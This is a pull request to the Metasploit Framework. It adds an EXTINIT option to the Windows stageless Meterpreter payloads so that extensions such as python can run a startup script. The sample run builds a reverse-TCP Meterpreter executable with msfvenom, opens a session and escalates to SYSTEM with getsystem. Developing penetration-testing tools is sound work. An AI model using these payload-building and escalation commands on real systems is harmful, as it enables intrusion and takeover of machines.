### PR TITLE
Stageless extension initialization

### DIFF
--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -156,11 +156,7 @@ private
     end
 
     # terminate the extensions with a 0 size
-    if is_x86?
-      config << [0].pack('V')
-    else
-      config << [0].pack('Q<')
-    end
+    config << [0].pack('V')
 
     # wire in the extension init data
     (@opts[:ext_init] || '').split(':').each do |cfg|

--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -120,6 +120,20 @@ private
     extension_data = [ ext.length, ext ].pack('VA*')
   end
 
+  def extension_init_block(name, value)
+    # for now, we're going to blindly assume that the value is a path to a file
+    # which contains the data that gets passed to the extension
+    content = ::File.read(value)
+    data = [
+      name,
+      "\x00",
+      content.length,
+      content
+    ]
+
+    data.pack('A*A*VA*')
+  end
+
   def config_block
     # start with the session information
     config = session_block(@opts)
@@ -147,6 +161,15 @@ private
     else
       config << [0].pack('Q<')
     end
+
+    # wire in the extension init data
+    (@opts[:ext_init] || '').split(':').each do |cfg|
+      name, value = cfg.split(',')
+      config << extension_init_block(name, value)
+    end
+
+    # terminate the ext init config with a final null byte
+    config << "\x00"
 
     # and we're done
     config

--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -35,7 +35,8 @@ module Metasploit4
       ))
 
     register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions'])
     ], self.class)
   end
 
@@ -53,7 +54,8 @@ module Metasploit4
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config_bind_tcp(opts)],
-      extensions: (datastore['EXTENSIONS'] || '').split(',')
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_init:   (datastore['EXTINIT'] || '')
     }
 
     # create the configuration instance based off the parameters

--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -35,7 +35,8 @@ module Metasploit4
       ))
 
     register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions'])
     ], self.class)
   end
 
@@ -54,7 +55,8 @@ module Metasploit4
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config_reverse_http(opts)],
-      extensions: (datastore['EXTENSIONS'] || '').split(',')
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_init:   (datastore['EXTINIT'] || '')
     }
 
     # create the configuration instance based off the parameters

--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -35,7 +35,8 @@ module Metasploit4
       ))
 
     register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions'])
     ], self.class)
   end
 
@@ -54,7 +55,8 @@ module Metasploit4
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config_reverse_https(opts)],
-      extensions: (datastore['EXTENSIONS'] || '').split(',')
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_init:   (datastore['EXTINIT'] || '')
     }
 
     # create the configuration instance based off the parameters

--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -35,7 +35,8 @@ module Metasploit4
       ))
 
     register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions']),
       OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0])
     ], self.class)
   end
@@ -54,7 +55,8 @@ module Metasploit4
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config_reverse_ipv6_tcp(opts)],
-      extensions: (datastore['EXTENSIONS'] || '').split(',')
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_init:   (datastore['EXTINIT'] || '')
     }
 
     # create the configuration instance based off the parameters

--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -35,7 +35,8 @@ module Metasploit3
       ))
 
     register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions']),
     ], self.class)
   end
 
@@ -53,7 +54,8 @@ module Metasploit3
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config_reverse_tcp(opts)],
-      extensions: (datastore['EXTENSIONS'] || '').split(',')
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_init:   (datastore['EXTINIT'] || '')
     }
 
     # create the configuration instance based off the parameters

--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -35,7 +35,8 @@ module Metasploit4
       ))
 
     register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions'])
     ], self.class)
   end
 
@@ -53,7 +54,8 @@ module Metasploit4
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config_bind_tcp(opts)],
-      extensions: (datastore['EXTENSIONS'] || '').split(',')
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_init:   (datastore['EXTINIT'] || '')
     }
 
     # create the configuration instance based off the parameters

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -35,7 +35,8 @@ module Metasploit4
       ))
 
     register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions'])
     ], self.class)
   end
 
@@ -54,7 +55,8 @@ module Metasploit4
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config_reverse_http(opts)],
-      extensions: (datastore['EXTENSIONS'] || '').split(',')
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_init:   (datastore['EXTINIT'] || '')
     }
 
     # create the configuration instance based off the parameters

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -35,7 +35,8 @@ module Metasploit4
       ))
 
     register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions'])
     ], self.class)
   end
 
@@ -54,7 +55,8 @@ module Metasploit4
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config_reverse_https(opts)],
-      extensions: (datastore['EXTENSIONS'] || '').split(',')
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_init:   (datastore['EXTINIT'] || '')
     }
 
     # create the configuration instance based off the parameters

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -35,7 +35,8 @@ module Metasploit4
       ))
 
     register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions']),
       OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0])
     ], self.class)
   end
@@ -54,7 +55,8 @@ module Metasploit4
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config_reverse_ipv6_tcp(opts)],
-      extensions: (datastore['EXTENSIONS'] || '').split(',')
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_init:   (datastore['EXTINIT'] || '')
     }
 
     # create the configuration instance based off the parameters

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -35,7 +35,8 @@ module Metasploit4
       ))
 
     register_options([
-      OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions']),
     ], self.class)
   end
 
@@ -53,7 +54,8 @@ module Metasploit4
       expiration: datastore['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config_reverse_tcp(opts)],
-      extensions: (datastore['EXTENSIONS'] || '').split(',')
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_init:   (datastore['EXTINIT'] || '')
     }
 
     # create the configuration instance based off the parameters

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -36,7 +36,7 @@ module Metasploit4
 
     register_options([
       OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load']),
-      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions']),
+      OptString.new('EXTINIT',    [false, 'Initialision strings for extensions'])
     ], self.class)
   end
 


### PR DESCRIPTION
This is the MSF PR that is associated with the Meterpreter PR located here: https://github.com/rapid7/metasploit-payloads/pull/51

Stageless extensions can now receive a parameter on startup that lets them do something prior to Meterpreter connecting back to MSF. At the moment, the `python` extension is the only one that supports this.

A new parameter has been added to the windows stageless payloads, this is called `EXTINIT` and contains the "extension initialisation" information. Below shows a sample command line that wires in a script for the `python` extension to run on startup:

```
./msfvenom -p ... LHOST=... EXTENSIONS=python EXTINIT=python,/path/to/script.py ...
```

The `EXTINIT` parameter is in the format: `ext1_name,path_to_file:ext2_name,path_to_file:...`

Extensions, in future, may also require such ability to initialise, which is why this is intended to be a little generic.

Note, this feature does not currently verify that the extension name given is included in the list of extensions that have been wired into the binary.
## Sample Run

Script content:

```
$ cat /Users/oj/test.py
import meterpreter.transport
meterpreter.transport.add("tcp://127.0.0.1:8000")
```

Binary creation:

```
$ ./msfvenom -p windows/x64/meterpreter_reverse_tcp LPORT=6005 LHOST=172.16.52.1 EXTENSIONS=stdapi,priv,python EXTINIT=python,/Users/oj/test.py -f exe -o ~/scratch/a-meterp64.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
WARNING: Local file /Users/oj/code/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible Metasploit framework
WARNING: Local file /Users/oj/code/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /Users/oj/code/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
WARNING: Local file /Users/oj/code/metasploit-framework/data/meterpreter/ext_server_python.x64.dll is being used
No encoder or badchars specified, outputting raw payload
Payload size: 7485589 bytes
Saved as: /Users/oj/scratch/a-meterp64.exe
```

Shell creation, validation that the script ran, and a random call to bindings to make sure the old stuff still works:

```
msf exploit(handler) > [*] Meterpreter session 5 opened (172.16.52.1:6005 -> 172.16.52.167:49161) at 2015-11-20 13:02:18 +1000
sessions -i -1
[*] Starting interaction with 5...

meterpreter > transport list
Session Expiry  : @ 2015-11-27 13:02:14

    ID  Curr  URL                     Comms T/O  Retry Total  Retry Wait
    --  ----  ---                     ---------  -----------  ----------
    1         tcp://127.0.0.1:8000    300        3600         10
    2   *     tcp://172.16.52.1:6005  300        3600         10

meterpreter > python_execute "import meterpreter.elevate,meterpreter.user;meterpreter.elevate.getsystem();print meterpreter.user.getuid();meterpreter.elevate.rev2self();print meterpreter.user.getuid()"
[+] Content written to stdout:
NT AUTHORITY\SYSTEM
WIN-TV01I7GG7JK\oj
```
## Verification
- [x] Create a simple python script to run on startup.
- [x] Create a stageless payload (x64 and x86) that uses the new `EXTINIT` and reference the script created in the previous step.
- [x] Create a session using this binary.
- [x] Validate that the script ran on startup.
- [x] Make sure I didn't break anything in the `python_execute` or `python_import` functions.
- [x] Make sure I didn't do anything stupid in the code.

Thanks!
